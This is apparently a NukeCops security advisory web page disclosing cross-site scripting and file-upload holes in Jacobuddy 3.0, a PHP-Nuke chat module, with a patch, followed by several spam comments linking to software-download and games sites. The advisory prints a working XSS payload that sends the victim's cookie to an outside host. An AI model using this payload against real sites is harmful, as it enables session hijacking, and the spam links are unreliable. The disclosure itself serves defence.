You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 56 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Security: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit
SecurityOfficially Released For Publication by Computer Cops.

Jacobuddy a Javascript Real Time Chat Module is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and file system manipulation. It is our belief to contact the author prior to a public posting, but in this case we have supplied a fix for both vulnerabilities of this addon.

The following URL is a sample of how Jacobuddy can be seeded with a XSS exploit within the message body:

http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)

The current unpatched version will automatically redirect the receiver's pop-up Jacobuddy message to another site grabbing their cookie information from the attacked site.

The patch for this is applied to the buddy.php file:

In the following function block:

function send($to, $to_userid, $message, $subject) {

Add the following line after the global statement:

$message = htmlspecialchars(strip_tags($message));

The next vulnerability is the infamous dcc file transfer within the buddy.php file.

Any file uploaded into the system can stay on the system. A malicious script can be generated to grab vital file system data like the php-nuke config.php file and turned into a text file for the malicious uploader to access. Computer Cops highly advises that the entire dcc function be removed from the file in addition to the dcc case block and $who_online clause for the dcc link.

Computer Cops will make an attempt to contact the vendor with this information.
Posted on Saturday, March 01 @ 23:44:02 CET by Zhen-Xjell
 
Related Links
· Computer Cops
· More about Security
· News by Zhen-Xjell
Most read story about Security:
PHP-Nuke admin.php security hole - PATCHED
Article Rating
Average Score: 5
Votes: 1


Please take a second and vote for this article:

Excellent
Very Good
Good
Regular
Bad
Options

 Printer Friendly Page  Printer Friendly Page

 Send to a Friend  Send to a Friend
Threshold
The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Re: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 1)
by nero6 on Tuesday, August 12 @ 14:38:55 CEST
(User Info | Send a Message) http://forum.jsoftj.com/
Free Download Manager [www.jsoftj.com] - FlashGet [www.jsoftj.com] - Windows Live Messenger [www.jsoftj.com] - Y! Multi Messenger [www.jsoftj.com] - Messenger Plus! Live [www.jsoftj.com] - DirectX [www.jsoftj.com] - Nokia PC Suite [www.jsoftj.com] - ZoneAlarm [www.jsoftj.com] - DVB Dream [www.jsoftj.com] - skype [www.jsoftj.com] - ESET NOD32 Antivirus [www.jsoftj.com] - Google Earth [www.jsoftj.com] - فتح اكثر من ياهو [www.jsoftj.com] - فتح اكثر من ماسنجر 8.5 [www.jsoftj.com] - فتح اكثر من ماسنجر 9 [www.jsoftj.com] Norton [www.jsoftj.com] - RealPlayer [www.jsoftj.com] -   Windows Media Player [www.jsoftj.com] - Kaspersky Anti-Virus Mobile [www.jsoftj.com] - Internet Download Manager [www.jsoftj.com] - Internet Explorer [www.jsoftj.com] -  Youtube [www.jsoftj.com] -  LimeWire Pro [www.jsoftj.com] - Download Accelerator Plus [www.jsoftj.com] - Windows Live Messenger 9 [www.jsoftj.com] - Opera [www.jsoftj.com] - Nero 8 [www.jsoftj.com]



Re: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 1)
by nero6 on Tuesday, August 12 @ 14:39:00 CEST
(User Info | Send a Message) http://forum.jsoftj.com/
Media Player Classic [www.jsoftj.com] - Yahoo! Messenger [www.jsoftj.com] - Kaspersky Virus Removal Tool [www.jsoftj.com] - Kaspersky Internet Security 2009 [www.jsoftj.com] - Kaspersky Anti-Virus 2009 [www.jsoftj.com] - Trojan Remover [www.jsoftj.com] - Hide IP Platinum [www.jsoftj.com] - Update AVG [www.jsoftj.com] - Kaspersky Anti-Virus Update [www.jsoftj.com] - McAfee Updates [www.jsoftj.com] - BitDefender [www.jsoftj.com] 3GP Player [www.jsoftj.com] - MobiMB Mobile Media Browser [www.jsoftj.com] - Online TV Player [www.jsoftj.com] - Satellite TV For PC 2008 Elite Edition [www.jsoftj.com] - Free Internet TV [www.jsoftj.com] - ProgDVB [www.jsoftj.com] - Super Internet TV [www.jsoftj.com] - TVUPlayer [www.jsoftj.com] - Super Internet TV Satellite 2008 [www.jsoftj.com] - WinRAR [www.jsoftj.com] - WinZip [www.jsoftj.com]



Re: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 1)
by nero6 on Tuesday, August 12 @ 14:39:07 CEST
(User Info | Send a Message) http://forum.jsoftj.com/
فيديو youtube [forum.jsoftj.com]- فيديو Google - انمي [forum.jsoftj.com] - افلام كرتون [forum.jsoftj.com] - توم وجيري [forum.jsoftj.com] - القط والفار [forum.jsoftj.com] - افلام كرتون اسلامية [forum.jsoftj.com] - قصص واقعية [forum.jsoftj.com] - قصص وعبر [forum.jsoftj.com] - قصص الانبياء [forum.jsoftj.com] - قصص القرآن الكريم [forum.jsoftj.com] - قصص وحكايات اطفال [forum.jsoftj.com] - خواطر [forum.jsoftj.com] - اناشيد اسلامية [forum.jsoftj.com] - اناشيد اطفال [forum.jsoftj.com] - اناشيد فرقة طيور الجنة [forum.jsoftj.com] - ديكور [forum.jsoftj.com] - ديكور منازل [forum.jsoftj.com] - مكياج [forum.jsoftj.com] - طبخ في مطبخ حواء [forum.jsoftj.com] - ازياء و موضة [forum.jsoftj.com] - ماسنجر [forum.jsoftj.com] - توبيكات [forum.jsoftj.com] - موبايل MOBILE [forum.jsoftj.com] - العاب طبخ [girls-games.jsoftj.com] - العاب باربي [girls-games.jsoftj.com] - Youtube [www.jsoftj.com] - youtube.com [www.jsoftj.com] - العاب بنات جديدة [girls-games.jsoftj.com] - العاب قص الشعر - شعر [girls-games.jsoftj.com] - Read the rest of this comment...

Re: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 1)
by nero6 on Tuesday, August 12 @ 14:39:13 CEST
(User Info | Send a Message) http://forum.jsoftj.com/
العاب جي سوفت [girls-games.jsoftj.com] - العاب بنات جي سوفت [girls-games.jsoftj.com] - لعبة تلبيس براتز [girls-games.jsoftj.com] - العاب اولاد [girls-games.jsoftj.com] - العاب رجال [girls-games.jsoftj.com] -   العاب بنات [girls-games.jsoftj.com] - العاب طبخ [girls-games.jsoftj.com] - العاب باربي [girls-games.jsoftj.com] - العاب مكياج [girls-games.jsoftj.com] - العاب بنات جديدة [girls-games.jsoftj.com] - العاب اطفال [girls-games.jsoftj.com] - العاب ترتيب الغرف [girls-games.jsoftj.com] - العاب ديكور [girls-games.jsoftj.com] - العاب قص الشعر [girls-games.jsoftj.com] - العاب تلبيس [girls-games.jsoftj.com] - العاب ميك اب [girls-games.jsoftj.com] -  | Dress Up GAMES [girls-games.jsoftj.com] | Kids Games [girls-games.jsoftj.com] | Barbie Games [girls-games.jsoftj.com] | Room Decor Games [girls-games.jsoftj.com] | Cooking Games [girls-games.jsoftj.com] | Adventure Games [girls-games.jsoftj.com] | Action Games [girls-games.jsoftj.com] | Makeover makeup make up Games [girls-games.jsoftj.com] | Other Games [girls-games.jsoftj.com] - موقع [site.jsoftj.com] | جي سوفت [www.jsoftj.com] | برامج [www.jsoftj.com] | العاب بنات [girls-games.jsoftj.com] |

Read the rest of this comment...
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.106 Seconds - 328 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::